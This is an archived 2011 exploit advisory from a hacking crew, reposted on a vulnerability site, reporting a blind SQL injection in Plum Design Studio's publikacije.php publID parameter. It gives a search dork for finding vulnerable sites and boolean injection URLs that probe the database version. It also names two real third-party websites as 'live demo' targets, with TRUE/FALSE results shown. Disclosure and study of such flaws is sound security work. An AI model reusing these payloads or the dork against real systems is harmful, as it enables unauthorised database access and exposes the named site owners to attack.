Plum Design Studio Blind SQL Injection

2011.04.29
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

========================================================================= PLUM DESIGN STUDIO (publikacije.php?publID) BSQL-i Vulnerability ========================================================================== +=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+= +=+=+= +=+=+= +=+=+= /\ | | | | ________ _____ _____ __ _ __ +=+=+= +=+=+= / \ | |__| | _____ / ______/ | _ \ | ____|\ \ / \ / / +=+=+= +=+=+= / /\ \| |__| | /_____/ | | | |_) / | |__ \ \/ \/ / +=+=+= +=+=+= / ____ \ | | | | |_______ | __\ \ | __| \ / +=+=+= +=+=+= /_/ \_\| | | |________/ |_| \_\ | |_______\_____/_____ +=+=+= +=+=+= |_____________________|+=+=+= +=+=+= +=+=+= +=+=+= X-n3t - **RoAd_KiLlEr** - The|Denny` - The_1nv1s1bl3 +=+=+= +=+=+= +=+=+= +=+=+= 0ne Nation , 0ne People , 0ne Culture , 0ne Language = Ethnic Albania +=+=+= +=+=+= +=+=+= +=+=+= ....::: | ALBANIAN HACKING CREW | :::.... 2011 +=+=+= +=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+= 0 0 1 ########################################### 1 0 I'm **RoAd_KiLlEr** member from 1337 DAY Team 1 1 ########################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 [+]Title :.......PLUM DESIGN STUDIO (publikacije.php?publID) BSQL-i Vulnerability [+]Author :......**RoAd_KiLlEr** [+]Tested on :...Win Xp Sp 2/3 --------------------------------------------------------------------------- [~] Founded by **RoAd_KiLlEr** [~] Team: Albanian Hacking Crew [~] Contact: sukihack[at]gmail[dot]com [~] Home: http://1337day.com/author/2447 [~] Vendor: http://www.plum-design.net ==========ExPl0iT3d by **RoAd_KiLlEr**========== [+] DORK: Powered by PlumDesign site:.rs [ I ]. BSQL-i Vulnerability +=+=+=+=+=+=+=+=+=+=+=+=+=+=+ [P0C]: http://127.0.0.1/publikacije.php?publID=[BLIND SQL INJECTION] [D3m0]: http://127.0.0.1/publikacije.php?publID=[Valid publID]+and+substring(version(),1,1)=5 http://127.0.0.1/publikacije.php?publID=[Valid publID]+and+substring(version(),1,1)=4 [L!v3 D3m0]: http://www.tehnixbeo.rs//publikacije.php?publID=48+and+substring(version(),1,1)=5 <== TRUE http://www.tehnixbeo.rs//publikacije.php?publID=48+and+substring(version(),1,1)=4 <== FALSE http://www.ekofkarijera.com/publikacije.php?tmpl=publ_clanak&publ_aricleID=121+and+substring(version(),1,1)=4 <== TRUE http://www.ekofkarijera.com/publikacije.php?tmpl=publ_clanak&publ_aricleID=121+and+substring(version(),1,1)=5 <== FALSE [+] TIME TABLE: 26 April 2011 - Vulnerability discovered. 27 April 2011 - Advisory released. =========================================================================================== [!] Albanian Hacking Crew =========================================================================================== [!] **RoAd_KiLlEr** =========================================================================================== [!] MaiL: sukihack[at]gmail[dot]com =========================================================================================== [!] Greetz To : Ton![w]indowS | X-n3t | The|DennY` | THE_1NV1S1BL3 | KHG & All Albanian/Kosova Hackers =========================================================================================== [!] Spec Th4nks: r0073r | indoushka | Sid3^effects | DoNnY | All 1337day Members | And All My Friendz =========================================================================================== [!] Red n'black i dress eagle on my chest It's good to be an ALBANIAN Keep my head up high for that flag I die Im proud to be an ALBANIAN ===========================================================================================


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top